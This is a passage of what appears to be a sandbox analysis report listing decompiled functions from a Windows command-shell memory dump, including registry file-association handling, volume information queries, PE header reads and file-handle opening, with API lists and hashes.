								if(( *(_t73 + _t90) & 0x0000ffff) == 0) {
									break;
								} else {
									_t88 = _t88 - 1;
									 *_t73 =  *(_t73 + _t90) & 0x0000ffff;
									_t73 =  &(_t73[1]);
									_t75 = _v532;
									_t99 = _t99 - 1;
									if(_t99 != 0) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L16;
							}
							if(_t99 == 0) {
								goto L15;
							}
						}
						L16:
						_t82 = 0;
						 *_t73 = 0;
					}
					_t98 = RegOpenKeyExW(_v540,  &_v528, 0, 0x2000000,  &_v536);
					if(_t98 == 0) {
						L30:
						if(_t93 == 0 ||  *_t93 == 0) {
							_t98 = RegDeleteValueW(_v536, 0);
							if(_t98 != 0) {
								E00D8C5A2(_t82, 0x400023a5, 1, _t75);
								goto L39;
							}
						} else {
							_t85 = _t93;
							_t90 =  &(_t85[2]);
							do {
								_t55 =  *_t85;
								_t85 =  &(_t85[2]);
							} while (_t55 != 0);
							_t87 = _t85 - _t90 >> 1;
							_t98 = RegSetValueExW(_v536, 0xd824ac, 0, 2, _t93, 2 + (_t85 - _t90 >> 1) * 2);
							if(_t98 != 0) {
								_push(0);
								_push(_t98);
								E00D8C5A2(_t87);
								E00D8C5A2(_t87, 0x235d, 1, _t75);
							} else {
								_push(_t93);
								_push(_t75);
								E00D925D9(L"%s=%s\r\n");
								L39:
							}
						}
						RegCloseKey(_v536);
						goto L41;
					} else {
						if(_t93 == 0 ||  *_t93 == 0) {
							E00D8C5A2(_t82, 0x400023a5, 1, _t75);
							L41:
							_t52 = _t98;
						} else {
							_t98 =  &_v528;
							while(1) {
								_t62 =  *_t98 & 0x0000ffff;
								_t82 = _t62;
								_v532 = _t62;
								if(_t62 == 0) {
									goto L25;
								}
								_t90 = _t62;
								while(1) {
									_t82 = _t90 & 0x0000ffff;
									_v532 = _t90 & 0x0000ffff;
									if(_t90 == 0x5c) {
										goto L25;
									}
									_t71 = _t98[1] & 0x0000ffff;
									_t98 =  &(_t98[1]);
									_t82 = _t71;
									_t90 = _t71;
									_v532 = _t71;
									if(_t71 != 0) {
										continue;
									}
									goto L25;
								}
								L25:
								 *_t98 = 0;
								_t67 = RegCreateKeyExW(_v540,  &_v528, 0, 0, 0, 0x2000000, 0,  &_v536,  &_v548);
								_v544 = _t67;
								if(_t67 != 0) {
									E00D8C5A2(_t82, 0x400023a5, 1, _t75);
									_t52 = _v544;
								} else {
									_t69 = _v532;
									if(_t69 == 0) {
										goto L30;
									} else {
										 *_t98 = _t69;
										_t98 =  &(_t98[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L42;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E00D8C5A2(__ecx);
					_t52 = 1;
				}
				L42:
				return E00D96FD0(_t52, _t75, _v8 ^ _t100, _t90, _t93, _t98);
			}

0x00da59f1
0x00da59f8
0x00da59fc
0x00da59fe
0x00da5a05
0x00da5a07
0x00da5a0e
0x00da5a11
0x00da5a16
0x00da5a16
0x00da5a19
0x00da5a1c
0x00da5a2d
0x00da5a56
0x00da5a5b
0x00da5a5d
0x00da5a66
0x00da5a6c
0x00da5a6f
0x00da5a72
0x00000000
0x00000000
0x00000000
0x00da5a72
0x00da5a7c
0x00da5a7e
0x00da5a82
0x00da5a8a
0x00da5a8d
0x00da5a8f
0x00da5acc
0x00da5acc
0x00da5a91
0x00da5a96
0x00da5a9b
0x00da5a9d
0x00da5aa8
0x00da5aae
0x00000000
0x00da5ab0
0x00da5ab4
0x00da5ab5
0x00da5ab8
0x00da5abb
0x00da5ac1
0x00da5ac4
0x00000000
0x00da5ac6
0x00000000
0x00da5ac6
0x00da5ac4
0x00000000
0x00da5aae
0x00da5aca
0x00000000
0x00000000
0x00da5aca
0x00da5acf
0x00da5acf
0x00da5ad1
0x00da5ad1
0x00da5af5
0x00da5af9
0x00da5bdd
0x00da5bdf
0x00da5c55
0x00da5c59
0x00da5c63
0x00000000
0x00da5c63
0x00da5be7
0x00da5be7
0x00da5be9
0x00da5bec
0x00da5bec
0x00da5bef
0x00da5bf2
0x00da5bf9
0x00da5c19
0x00da5c1d
0x00da5c2d
0x00da5c2f
0x00da5c30
0x00da5c3d
0x00da5c1f
0x00da5c1f
0x00da5c20
0x00da5c26
0x00da5c68
0x00da5c68
0x00da5c1d
0x00da5c71
0x00000000
0x00da5aff
0x00da5b01
0x00da5bd0
0x00da5c77
0x00da5c77
0x00da5b11
0x00da5b11
0x00da5b17
0x00da5b17
0x00da5b1a
0x00da5b1c
0x00da5b25
0x00000000
0x00000000
0x00da5b27
0x00da5b29
0x00da5b29
0x00da5b2c
0x00da5b36
0x00000000
0x00000000
0x00da5b38
0x00da5b3c
0x00da5b3f
0x00da5b41
0x00da5b43
0x00da5b4c
0x00000000
0x00000000
0x00000000
0x00da5b4c
0x00da5b4e
0x00da5b50
0x00da5b7b
0x00da5b81
0x00da5b89
0x00da5bb5
0x00da5bba
0x00da5b8b
0x00da5b8b
0x00da5b94
0x00000000
0x00da5b96
0x00da5b9c
0x00da5b9f
0x00da5ba2
0x00000000
0x00da5ba2
0x00da5b94
0x00000000
0x00da5b89
0x00da5b17
0x00da5b01
0x00da5a2f
0x00da5a2f
0x00da5a31
0x00da5a36
0x00da5a3e
0x00da5a3e
0x00da5c79
0x00da5c89

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00DA5AEF
RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00DA5B7B
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00DA5BA2
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D824AC,00000000,00000002,?,00000000), ref: 00DA5C13
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00DA5C4F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00DA5C71

Strings

\Shell\Open\Command, xrefs: 00DA5A91
%s=%s, xrefs: 00DA5C21

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: e471a3af5d939adb70837247ceb9f5fa310c97362f12132a622198d2897fb0cc
Instruction ID: e40b8868ec7745ef3ca1cf1f4762cec240c393ba302f5d0b7f524a975aa8ab93
Opcode Fuzzy Hash: e471a3af5d939adb70837247ceb9f5fa310c97362f12132a622198d2897fb0cc
Instruction Fuzzy Hash: 9E711A71E4072A9BDB309B14DC89FF9B3B5EF55700F1802A5E849A7294E7719E80CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00DA6B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0xd83a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E00D925D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0xdc3cb8;
					if(_t54 == 0) {
						_t54 = 0xdc3ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0xdc3d00);
						if(_v790 == 0) {
							E00D9274C();
							E00D8C108(_t66, 0x235e, 1, 0xdc3d00);
							_t81 = _t80 + 0x1c;
						} else {
							E00D9274C();
							_push( &_v790);
							E00D8C108(_t66, 0x235f, 2, 0xdc3d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E00D9274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E00D8C108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E00D925D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E00D8C5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E00D96FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}

0x00da6b30
0x00da6b38
0x00da6b3e
0x00da6b45
0x00da6b4c
0x00da6b52
0x00da6b56
0x00da6b58
0x00da6b5f
0x00da6b64
0x00da6b67
0x00da6b6e
0x00da6b75
0x00da6b91
0x00da6b93
0x00da6b96
0x00da6b96
0x00da6b99
0x00da6b9c
0x00da6baa
0x00da6cc4
0x00da6cc9
0x00da6ccc
0x00da6ccd
0x00000000
0x00da6bcb
0x00da6bcf
0x00da6bd5
0x00000000
0x00da6bd5
0x00da6b77
0x00da6b77
0x00da6b7e
0x00da6b80
0x00da6b80
0x00da6b89
0x00da6bd7
0x00da6bd7
0x00da6bda
0x00da6bde
0x00da6be1
0x00da6c09
0x00da6c3a
0x00da6c3b
0x00da6c45
0x00da6c4a
0x00da6c4b
0x00da6c69
0x00da6c76
0x00da6c7b
0x00da6c4d
0x00da6c4d
0x00da6c56
0x00da6c5f
0x00da6c64
0x00da6c64
0x00da6c83
0x00da6c9c
0x00da6cb3
0x00da6cb8
0x00da6cbb
0x00da6c0b
0x00da6c10
0x00da6c16
0x00da6c1e
0x00da6c21
0x00da6c29
0x00da6c29
0x00da6c2b
0x00da6c2c
0x00da6ccf
0x00da6ccf
0x00da6cd7
0x00da6cd8
0x00da6c09
0x00da6ce0
0x00da6ce1
0x00da6cec

APIs

towupper.MSVCRT ref: 00DA6B89
iswalpha.MSVCRT ref: 00DA6BBC
towupper.MSVCRT ref: 00DA6BCF
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00DA6C01
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA6C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA6C23

Strings

:\, xrefs: 00DA6B4C
%04X-%04X, xrefs: 00DA6C8A

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorLasttowupper$InformationVolumeiswalpha
String ID: :\$%04X-%04X
API String ID: 4001382275-3541097225
Opcode ID: 61ab23d30ca2e21faa818af0f89f00c48678bcb72f5a00b39df86fb1e0cc73cc
Instruction ID: 4dcb49a06a38e56167a8b739c489690c70a7c97712b5da3685e39fe8c61fc3f6
Opcode Fuzzy Hash: 61ab23d30ca2e21faa818af0f89f00c48678bcb72f5a00b39df86fb1e0cc73cc
Instruction Fuzzy Hash: 8341F672614351EAD720AB659C4AEBB77ECDF89B10F08441DF9C9C62C0EA74DA44C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 00DA587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00DA587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0xdac0e0);
				E00D97678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0xd824ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E00D8C5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E00D8C5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E00D8C5A2(_t45);
						E00D8C5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E00D925D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E00D976BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E00D97797(_t45) != 0) {
							 *0xdcc020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}

0x00da587b
0x00da587b
0x00da587d
0x00da5882
0x00da5887
0x00da5889
0x00da588c
0x00da5893
0x00da5930
0x00da5936
0x00da5938
0x00da593d
0x00000000
0x00000000
0x00da5953
0x00da5955
0x00da595a
0x00da597a
0x00da597c
0x00da5981
0x00da5983
0x00da5985
0x00da598b
0x00da598b
0x00da598f
0x00da595c
0x00da595f
0x00da5961
0x00da5963
0x00da5969
0x00da5969
0x00da595f
0x00000000
0x00da58a2
0x00da58b5
0x00da58b7
0x00da58bc
0x00da5913
0x00da5913
0x00da5914
0x00da5915
0x00da5922
0x00000000
0x00da58be
0x00da58be
0x00da58c1
0x00da58c3
0x00da58c6
0x00da58c6
0x00da58c9
0x00da58cc
0x00da58d3
0x00da58eb
0x00da58ed
0x00da58f3
0x00da58fb
0x00000000
0x00000000
0x00da58fd
0x00da5900
0x00da5906
0x00da5995
0x00da5997
0x00da59dc
0x00da59e3
0x00da59e3
0x00da5999
0x00da5999
0x00da59a3
0x00da59ad
0x00da59ad
0x00da59b3
0x00000000
0x00da59b3
0x00da58bc

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA58AF
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0), ref: 00DA58E5
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA58F3
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA5930
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA594D
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D824AC,?,00000000,02000000,?,?,?,00000000,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA5974
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00DAC0E0,00000018,00DA4B14,00000000,00000003), ref: 00DA598F

Strings

%s=%s, xrefs: 00DA5901

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: a2048a9a51ee59d9f03cf875d00a01a8953d444c40f9d9ba1d5b7a6b651fc52d
Instruction ID: 507b26dbe5cce566c69c162beec3bee3abf80ed9466bac15d4dd931ecdca66c3
Opcode Fuzzy Hash: a2048a9a51ee59d9f03cf875d00a01a8953d444c40f9d9ba1d5b7a6b651fc52d
Instruction Fuzzy Hash: 9931A272C00615FEDB31AB559C09EAFBA78EF8BB60F084109F845AA265C6218D01CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA53E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00DA53E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0xdc8104 != 0) {
					L4:
					_t63 =  *0xdc8100;
					L5:
					if(_t63 != 0) {
						 *0xdc94b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E00DA573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E00D96FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0xdc8104 = _t47;
				if(_t47 == 0) {
					 *0xdc8104 =  *0xdc8104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0xdc8100 = _t63;
					goto L5;
				}
			}

0x00da53e0
0x00da53eb
0x00da53f2
0x00da53fc
0x00da53fe
0x00da540b
0x00da5440
0x00da5440
0x00da5446
0x00da5448
0x00da545c
0x00da5466
0x00da546c
0x00da548f
0x00da54a0
0x00da54db
0x00da551a
0x00da551c
0x00da5523
0x00da5531
0x00da5531
0x00da5523
0x00da54ae
0x00da54b5
0x00da54b5
0x00da54a0
0x00da548f
0x00da5466
0x00da554e
0x00da554e
0x00da5414
0x00da541a
0x00da5421
0x00da5439
0x00000000
0x00da5423
0x00da542f
0x00da5431
0x00000000
0x00da5431

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00DA5414
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00DA5429
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 00DA5487
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00DA54D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00DA54FA
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00DA5531

Strings

NTDLL.DLL, xrefs: 00DA540F
NtQueryInformationProcess, xrefs: 00DA5423

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 9795d0396fc799bd1015a1c50f2b3c43d1dd1f364dc4e4be48c05e8c8c64e295
Instruction ID: 1394f539abcc31d95ab6b63083265da26df4a2be4488e360b6fd885694c637e1
Opcode Fuzzy Hash: 9795d0396fc799bd1015a1c50f2b3c43d1dd1f364dc4e4be48c05e8c8c64e295
Instruction Fuzzy Hash: A04194B1A0031A9BDB209F25EC99E7EB7BCEB45754F044098A609E3340DB749E45CF74

Uniqueness

Uniqueness Score: -1.00%

Function 00D85DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00D85DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E00D922C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0xdc3cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0xdc3cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

0x00d85dbd
0x00d85dc6
0x00d85dc8
0x00d85dcf
0x00d85dd2
0x00d85dd5
0x00d85dd7
0x00d85ddd
0x00d85de8
0x00d85de8
0x00d85dec
0x00d85df3
0x00d85df3
0x00d85de1
0x00d85de6
0x00d85df6
0x00d85dfb
0x00d85dfe
0x00d99ce0
0x00d99ce3
0x00d99ced
0x00d99cf1
0x00d99cf1
0x00d99cf2
0x00d85e04
0x00d85e04
0x00d85e09
0x00d85e10
0x00d85e1a
0x00d85e6d
0x00d85e6d
0x00d85e1a
0x00d85e23
0x00d85e25
0x00d85e28
0x00d85e2e
0x00d99d0e
0x00d99d14
0x00d99d19
0x00000000
0x00000000
0x00d99d1f
0x00d99d22
0x00000000
0x00d85e34
0x00d85e34
0x00d85e43
0x00d85e49
0x00d85e4e
0x00d99d36
0x00d99d3c
0x00d99d44
0x00d99d4a
0x00d99d4a
0x00000000
0x00d99d44
0x00d85e54
0x00d85e57
0x00d85e5d
0x00d85e64
0x00d99d2b
0x00d99d2b
0x00000000
0x00d85e64
0x00d85e2e
0x00000000

APIs

_wcsicmp.MSVCRT ref: 00D85E10
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 00D85E43
_open_osfhandle.MSVCRT ref: 00D85E57
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D99D2B

Strings

con, xrefs: 00D85DF6

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: af56e04ea50052b38ab5cc0987486666c83e04c2ef37a476aa4c2fa69027cc21
Instruction ID: df5cc3e80f4a3b74bf0c41541874bf3841d8e20116bdb62c0c2d7ae5b38183d1
Opcode Fuzzy Hash: af56e04ea50052b38ab5cc0987486666c83e04c2ef37a476aa4c2fa69027cc21
Instruction Fuzzy Hash: D4310932A04616AFE724AB68AC9DF6EB7A9E745731F244219F861E32C4DB708D018770

Uniqueness

Uniqueness Score: -1.00%

Function 00DA554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00DA554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				signed int _t15;
				signed short _t23;
				signed short* _t31;
				signed int _t32;
				void* _t42;
				void* _t43;
				signed int _t44;

				_t41 = __edx;
				_t12 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t12 ^ _t44;
				_t42 = 0;
				_t32 = 0;
				if(__ecx != 0) {
					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t43 == 0xffffffff) {
						L16:
						_t15 = _t32;
						goto L17;
					}
					_t41 =  &_v76;
					if(E00DA5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
						_t41 =  &_v100;
						if(E00DA5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
							_t41 =  &_v96;
							if(E00DA5768(_t43,  &_v96, 0x14) != 0) {
								_t23 = _v80;
								if(_t23 != 0) {
									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
									if(_t42 != 0) {
										_t41 = _t42;
										if(E00DA5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
											_t41 = _t42;
											_t31 = E00DA573B(_v96, _t42);
											if(_t31 != 0) {
												_t32 =  *_t31 & 0x0000ffff;
											}
										}
